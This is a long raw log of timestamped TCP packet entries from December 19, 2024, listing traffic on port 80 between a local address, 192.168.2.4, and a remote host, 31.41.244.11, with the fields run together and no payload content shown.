                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.627105951 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.627211094 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.628082991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.628201008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.628288031 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.629218102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.629291058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.629303932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.630315065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.630409956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.630434990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.631412983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.631464005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.631535053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.631635904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.632514000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.632626057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.632731915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.633640051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.633721113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.633774042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.634740114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.634804964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.634848118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.635886908 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.635946989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.636006117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.636042118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.636972904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.636991024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.637104988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.638070107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.638175964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.638284922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.639188051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.639296055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.639309883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.640131950 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.640278101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.640377998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.640389919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.640454054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.641396046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.641478062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.641519070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.641630888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.642523050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.642616034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.642642021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.642746925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.643624067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.643676043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.643718004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.643768072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.644704103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.644851923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.644967079 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.645812035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.645926952 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.646044016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.646943092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.646992922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.647048950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.648056030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.648087978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.648117065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.648138046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.648216009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.649141073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.649220943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.649245977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.649297953 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.650258064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.650348902 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.650371075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.650417089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.651374102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.651457071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.651458979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.651511908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.652481079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.652573109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.652625084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.653589964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.653700113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.653745890 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.654726028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.654789925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.654871941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.655802011 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.655878067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.655914068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.656044006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.656917095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.656991959 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.657028913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.657078028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.658029079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.658071995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.658113956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.658158064 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.659152031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.659198046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.659224987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.659290075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.660219908 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.660329103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.660387993 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.661325932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.661375999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.661421061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.662467003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.662547112 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.662590027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.662751913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.663559914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.663676977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.663799047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.664660931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.664789915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.664875984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.665744066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.665874004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.665894985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.666874886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.666949987 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.666960001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.667037964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.667969942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.668085098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.668164968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.669080019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.669186115 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.669331074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.670193911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.670265913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.670301914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.670412064 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.671288013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.671330929 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.671392918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.671448946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.672398090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.672447920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.672494888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.673505068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.673552036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.673609018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.674631119 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.674717903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.674766064 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.675738096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.675816059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.675852060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.676843882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.676901102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.676933050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.677959919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.678006887 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.678144932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.678271055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.679009914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.683072090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.816437960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.816587925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.816591024 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.816606045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.816740036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.816927910 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.817020893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.817261934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.817280054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.817321062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.817370892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.817435980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818173885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818188906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818206072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818234921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818263054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818619967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818635941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818653107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818677902 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818703890 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818964958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.818981886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819061995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819108009 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819133043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819148064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819163084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819178104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819189072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819189072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819194078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819211960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819224119 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819246054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819273949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819295883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819310904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819340944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819365978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819453955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.819626093 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.820123911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.820138931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.820154905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.820185900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.820185900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.820261955 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.821933985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.822026014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.822341919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.822357893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.822412968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.826674938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.826692104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.826708078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.826736927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.826736927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.826764107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.827435970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.827593088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.827608109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.827658892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.827692986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.828324080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.828486919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.828504086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.828562021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.828562021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.829349041 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.829365969 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.829381943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.829417944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.829476118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.830252886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.830269098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.830286026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.830312967 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.830312967 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.830332994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.831078053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.831093073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.831108093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.831132889 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.831147909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.832020044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.832036018 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.832096100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.832096100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.832148075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.832395077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.832943916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.832959890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.832976103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.833029032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.833029032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.833239079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.833254099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.833270073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.833321095 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.833321095 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.834008932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.834105968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.834177017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.834192038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.834265947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835004091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835019112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835036039 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835063934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835063934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835115910 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.835743904 CET804986031.41.244.11192.168.2.4
